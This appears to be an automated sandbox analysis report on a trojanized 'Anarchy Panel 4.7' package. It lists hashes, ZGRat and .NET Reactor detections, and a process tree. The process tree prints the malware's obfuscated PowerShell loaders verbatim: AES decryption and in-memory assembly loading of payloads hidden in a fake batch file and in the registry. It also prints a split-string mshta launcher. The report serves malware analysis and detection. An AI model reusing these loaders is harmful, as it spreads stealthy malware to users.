Overview

Static analysis score: 10

Behavioral scores by target and platform:
Target                  windows7-x64   windows10-2004-x64
Anarchy Panel 4.7.zip   10             1
Anarchy Pa...el.exe     10             10
Anarchy Pa...oG.dll     10             1
Anarchy Pa...uJ.dll     1              1
Anarchy Pa...qM.dll     1              1
Anarchy Pa...LC.dll     1              1
Anarchy Pa...wp.dll     1              1
Anarchy Pa...uZ.dll     1              1
Anarchy Pa...nG.dll     1              1
Anarchy Pa...TS.dll     1              1
Anarchy Pa...xj.dll     1              1
Anarchy Pa...pi.dll     1              1
Anarchy Pa...s4.dll     1              1
Anarchy Pa...Ya.dll     1              1
Anarchy Pa...Jn.dll     1              1
Anarchy Pa...GA.dll     1              1
Analysis
- max time kernel: 9s
- max time network: 53s
- platform: windows10-2004_x64
- resource: win10v2004-20231020-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20231020-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 26-11-2023 16:10
Behavioral tasks (task: sample, resource):
- behavioral1: Anarchy Panel 4.7.zip (win7-20231023-en)
- behavioral2: Anarchy Panel 4.7.zip (win10v2004-20231023-en)
- behavioral3: Anarchy Panel 4.7/Anarchy Panel.exe (win7-20231020-en)
- behavioral4: Anarchy Panel 4.7/Anarchy Panel.exe (win10v2004-20231020-en)
- behavioral5: Anarchy Panel 4.7/Plugins/0guo3zbo66fqoG.dll (win7-20231023-en)
- behavioral6: Anarchy Panel 4.7/Plugins/0guo3zbo66fqoG.dll (win10v2004-20231023-en)
- behavioral7: Anarchy Panel 4.7/Plugins/59Zp7paEHDF7luJ.dll (win7-20231020-en)
- behavioral8: Anarchy Panel 4.7/Plugins/59Zp7paEHDF7luJ.dll (win10v2004-20231025-en)
- behavioral9: Anarchy Panel 4.7/Plugins/CjETR6GpGXqM.dll (win7-20231023-en)
- behavioral10: Anarchy Panel 4.7/Plugins/CjETR6GpGXqM.dll (win10v2004-20231023-en)
- behavioral11: Anarchy Panel 4.7/Plugins/EVa7gBMKoaHmLC.dll (win7-20231023-en)
- behavioral12: Anarchy Panel 4.7/Plugins/EVa7gBMKoaHmLC.dll (win10v2004-20231020-en)
- behavioral13: Anarchy Panel 4.7/Plugins/FBSyChwp.dll (win7-20231023-en)
- behavioral14: Anarchy Panel 4.7/Plugins/FBSyChwp.dll (win10v2004-20231020-en)
- behavioral15: Anarchy Panel 4.7/Plugins/G3nl0mDcABnDuZ.dll (win7-20231020-en)
- behavioral16: Anarchy Panel 4.7/Plugins/G3nl0mDcABnDuZ.dll (win10v2004-20231025-en)
- behavioral17: Anarchy Panel 4.7/Plugins/KNTmoSnG.dll (win7-20231023-en)
- behavioral18: Anarchy Panel 4.7/Plugins/KNTmoSnG.dll (win10v2004-20231023-en)
- behavioral19: Anarchy Panel 4.7/Plugins/PK0TcnqTGFagQTS.dll (win7-20231025-en)
- behavioral20: Anarchy Panel 4.7/Plugins/PK0TcnqTGFagQTS.dll (win10v2004-20231020-en)
- behavioral21: Anarchy Panel 4.7/Plugins/RssCnLKcGRxj.dll (win7-20231023-en)
- behavioral22: Anarchy Panel 4.7/Plugins/RssCnLKcGRxj.dll (win10v2004-20231023-en)
- behavioral23: Anarchy Panel 4.7/Plugins/WkUP83aP9CABpi.dll (win7-20231020-en)
- behavioral24: Anarchy Panel 4.7/Plugins/WkUP83aP9CABpi.dll (win10v2004-20231020-en)
- behavioral25: Anarchy Panel 4.7/Plugins/eMTYbTz0gueNs4.dll (win7-20231023-en)
- behavioral26: Anarchy Panel 4.7/Plugins/eMTYbTz0gueNs4.dll (win10v2004-20231023-en)
- behavioral27: Anarchy Panel 4.7/Plugins/fzAgyDYa.dll (win7-20231020-en)
- behavioral28: Anarchy Panel 4.7/Plugins/fzAgyDYa.dll (win10v2004-20231020-en)
- behavioral29: Anarchy Panel 4.7/Plugins/mGWHaG2Jn.dll (win7-20231023-en)
- behavioral30: Anarchy Panel 4.7/Plugins/mGWHaG2Jn.dll (win10v2004-20231025-en)
- behavioral31: Anarchy Panel 4.7/Plugins/mML6WKMqdxjDGA.dll (win7-20231020-en)
- behavioral32: Anarchy Panel 4.7/Plugins/mML6WKMqdxjDGA.dll (win10v2004-20231023-en)
General
- Target: Anarchy Panel 4.7/Anarchy Panel.exe
- Size: 57.8MB
- MD5: b278ec8cce77cdf9a1d71f19d035226f
- SHA1: 10f10d3cd6dbe6a7dba851ccafa883bf7738c904
- SHA256: 7e12be0dfed24554ac520ec7cf5ec1ee0239727e4f8866ea30a85a56903b219a
- SHA512: 3da33e91e1628097976b6f4fce5020a128a5f1a56242769feacd49f2f67fee23b3ac0361c12f5bd06576b10449712bf7d7545f94a99532113fbb0abff40b2c51
- SSDEEP: 1572864:+j2hoiTM651kZ0gIToFSO9PzN9qUyO0yMS:+j2hoiTz7i77dxPyH6
Malware Config
Signatures
- Detect ZGRat V1 (4 IoCs)
  Processes (resource: YARA rule):
  - C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe: family_zgrat_v1
  - C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe: family_zgrat_v1
  - C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe: family_zgrat_v1
  - behavioral4/memory/2708-17-0x0000000000460000-0x0000000003AFE000-memory.dmp: family_zgrat_v1
- .NET Reactor protector (4 IoCs)
  Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
  Processes (resource: YARA rule):
  - C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe: net_reactor
  - C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe: net_reactor
  - C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe: net_reactor
  - behavioral4/memory/2708-17-0x0000000000460000-0x0000000003AFE000-memory.dmp: net_reactor
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
Processes (tree depth, PID, image, command line)
- Depth 1, PID 2556, image C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe"
- Depth 2, PID 2708, image C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe"
- Depth 2, PID 6044, image C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\svchost.bat" "
- Depth 3, PID 3532, image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden
- Depth 3, PID 3080, image C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /S /D /c" echo function ZSHdk($KarSC){ $ZfCFn=[System.Security.Cryptography.Aes]::Create(); $ZfCFn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $ZfCFn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $ZfCFn.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('KtZKjEms98+Uz3JdAwXifcpceQe4mGFCZZetPfWLjV8='); $ZfCFn.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('XxhTpYt8KLdLDSpO7hDOxw=='); $tlguC=$ZfCFn.CreateDecryptor(); $return_var=$tlguC.TransformFinalBlock($KarSC, 0, $KarSC.Length); $tlguC.Dispose(); $ZfCFn.Dispose(); $return_var;}function CaoMW($KarSC){ $tLaFs=New-Object System.IO.MemoryStream(,$KarSC); $lDGtw=New-Object System.IO.MemoryStream; Invoke-Expression '$ixeoS #=# #N#e#w#-#O#b#j#e#c#t# #S#y#s#t#e#m#.#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#G#Z#i#p#S#t#r#e#a#m#(#$tLaFs,# #[#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#C#o#m#p#r#e#s#s#i#o#n#M#o#d#e#]#:#:#D#e#c#o#m#p#r#e#s#s#)#;#'.Replace('#', ''); $ixeoS.CopyTo($lDGtw); $ixeoS.Dispose(); $tLaFs.Dispose(); $lDGtw.Dispose(); $lDGtw.ToArray();}function akbWW($KarSC,$vyQOD){ $xXjIa = @( '$qtafy = [System.Reflection.Assembly]::("@L@o@a@d@".Replace("@", ""))([byte[]]$KarSC);', '$FBuAc = $qtafy.EntryPoint;', '$FBuAc.Invoke($null, $vyQOD);' ); foreach ($eBUTc in $xXjIa) { Invoke-Expression $eBUTc };}$QCWfW=[System.IO.File]::("@R@e@a@d@A@l@l@T@e@x@t@".Replace("@", ""))('C:\Users\Admin\AppData\Local\Temp\svchost.bat').Split([Environment]::NewLine);foreach ($hgEiC in $QCWfW) { if ($hgEiC.StartsWith('SEROXEN')) { $GFlqW=$hgEiC.Substring(7); break; }}$llOQb=CaoMW (ZSHdk ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($GFlqW)));akbWW $llOQb (,[string[]] ('C:\Users\Admin\AppData\Local\Temp\svchost.bat')); "
- Depth 1, PID 2976, image C:\Windows\$sxr-mshta.exe
  Command line: C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-TwfkFnoyLGWlxhzmArsw4312:WkABOEMU=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
- Depth 2, PID 5336, image C:\Windows\$sxr-cmd.exe
  Command line: "C:\Windows\$sxr-cmd.exe" /c %$sxr-TwfkFnoyLGWlxhzmArsw4312:WkABOEMU=%
- Depth 3, PID 3916, image C:\Windows\$sxr-powershell.exe
  Command line: C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass
- Depth 3, PID 228, image C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /S /D /c" echo function ASDgm($hbtlH){ $jvCLB=[System.Security.Cryptography.Aes]::Create(); $jvCLB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $jvCLB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $jvCLB.Key=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('blz4wP7NQ0z9G5HU5qt1rBXWDUDwhPjk4R14Im6s+lY='); $jvCLB.IV=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('tyHaD0iUmC1atKVX/rbjZw=='); $bkHaC=$jvCLB.('@C@r@e@a@t@e@D@e@c@r@y@p@t@o@r@'.Replace('@', ''))(); $KdWyo=$bkHaC.('@T@r@a@n@s@f@o@r@m@F@i@n@a@l@B@l@o@c@k@'.Replace('@', ''))($hbtlH, 0, $hbtlH.Length); $bkHaC.Dispose(); $jvCLB.Dispose(); $KdWyo;}function cHftl($hbtlH){ $ZLGfO=New-Object System.IO.MemoryStream(,$hbtlH); $pEGfA=New-Object System.IO.MemoryStream; Invoke-Expression '$YNTor @=@ @N@e@w@-@O@b@j@e@c@t@ @S@y@s@t@e@m@.@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@G@Z@i@p@S@t@r@e@a@m@(@$ZLGfO,@ @[@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@C@o@m@p@r@e@s@s@i@o@n@M@o@d@e@]@:@:@D@e@c@o@m@p@r@e@s@s@)@;@'.Replace('@', ''); $YNTor.CopyTo($pEGfA); $YNTor.Dispose(); $ZLGfO.Dispose(); $pEGfA.Dispose(); $pEGfA.ToArray();}function cDPce($hbtlH){ $KdWyo = [System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($hbtlH); $KdWyo = ASDgm($KdWyo); $KdWyo = [System.Text.Encoding]::('@U@T@F@8@'.Replace('@', '')).('@G@e@t@S@t@r@i@n@g@'.Replace('@', ''))($KdWyo); return $KdWyo;}function execute_function($hbtlH,$HyIWf){ $wMvLZ = @( '$gbejj = [System.Reflection.Assembly]::Load([byte[]]$hbtlH);', '$nYAXe = $gbejj.EntryPoint;', '$nYAXe.Invoke($null, $HyIWf);' ); foreach ($XGPPP in $wMvLZ) { Invoke-Expression $XGPPP };}$WwewB = cDPce('6jh9/JwNM6P3zg5yY8XZBg==');$pAwEN = cDPce('ZViCuth6vUsFE5+msWnrZo/mOl8APvimIOP0OBotRXY=');$EiozW = cDPce('e/do7iEa4WyK+N/slo150A==');$xMYjW = cDPce('0AZpRDqOSBwoRnb0ckOSHA==');if (@(get-process -ea silentlycontinue $xMYjW).count -gt 1) {exit};$AmhAI = [Microsoft.Win32.Registry]::('@L@o@c@a@l@M@a@c@h@i@n@e@'.Replace('@', '')).('@O@p@e@n@S@u@b@k@e@y@'.Replace('@', ''))($WwewB).('@G@e@t@V@a@l@u@e@'.Replace('@', ''))($pAwEN);$lPNsi=cHftl (ASDgm ([Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($AmhAI)));execute_function $lPNsi (,[string[]] ($EiozW)); "
Network
MITRE ATT&CK Enterprise v15
Downloads